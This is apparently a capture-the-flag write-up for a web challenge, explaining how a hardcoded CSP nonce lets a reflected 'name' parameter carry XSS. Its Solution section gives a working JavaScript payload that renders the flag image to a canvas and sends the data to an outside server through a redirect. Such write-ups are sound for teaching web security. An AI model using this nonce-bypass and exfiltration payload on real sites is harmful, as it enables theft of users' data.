# imgfiltrate

## Problem files
We're given the source code for a service that has a flag that we have to exfiltrate, and a bot that views it (so we already know it's going to be xss).

## Analysis
The index file is in `app/public/index.php`. The body looks like this:
```php
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width" />
        <title>imgfiltrate</title>
        <style>
body {
    font-family: -apple-system, BlinkMacSystemFont, Helvetica, Arial, sans-serif;
    padding: 2em;
}

h1 {
    margin-top: 2em;
    margin-bottom: 0;
}
</style>
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'; img-src 'self'; script-src 'nonce-<?php echo $nonce ?>';">
    </head>
    <body>
        <img id="flag" src="/flag.php">
        <p id="tag" hidden>Exfiltrate me</p>

        <script nonce=<?php echo $nonce ?>>
document.getElementById('flag').onmouseover = () => {
    document.getElementById('tag').hidden = false;
}

document.getElementById('flag').onmouseout = () => {
    document.getElementById('tag').hidden = true;
}
        </script>

        <h1>Hello <?php echo $_GET['name'] ?? 'bozo' ?></h1>
        <p>Unfortunately, only the admin can see the flag.</p>
    </body>
</html>
```

It looks like there's XSS, because it uses the `name` `GET` parameter, but the content security policy is set to require a nonce, which should defeat this type of exploit.

```php
<?php $nonce = "70861e83ad7f1863b3020799df93e450"; ?>
```

Unfortunately for this service, the nonce is hardcoded. If you are a frontend developen, do not do this.

So we have XSS, now what? We need to get the contents of the flag image, and the easiest way to do that is to draw it to a canvas and then call `canvas.toDataURL()`. To exfiltrate the data, we can redirect the page to log a 404 with the URL containing the data URL.

## Solution
The full JS I used was
```javascript
c = document.createElement("canvas"); i = document.querySelector("#flag"); setTimeout(function(){c.width = i.width; c.height = i.height; c.getContext("2d").drawImage(i, 0, 0); window.location = "http://blow-fly.cs.utexas.edu:13337/" + encodeURIComponent(c.toDataURL());}, 500)
```

I embedded it in a script tag with the nonce, ran that through encodeURIComponent(), stored it in the name parameter, and sent that url to the bot to view.
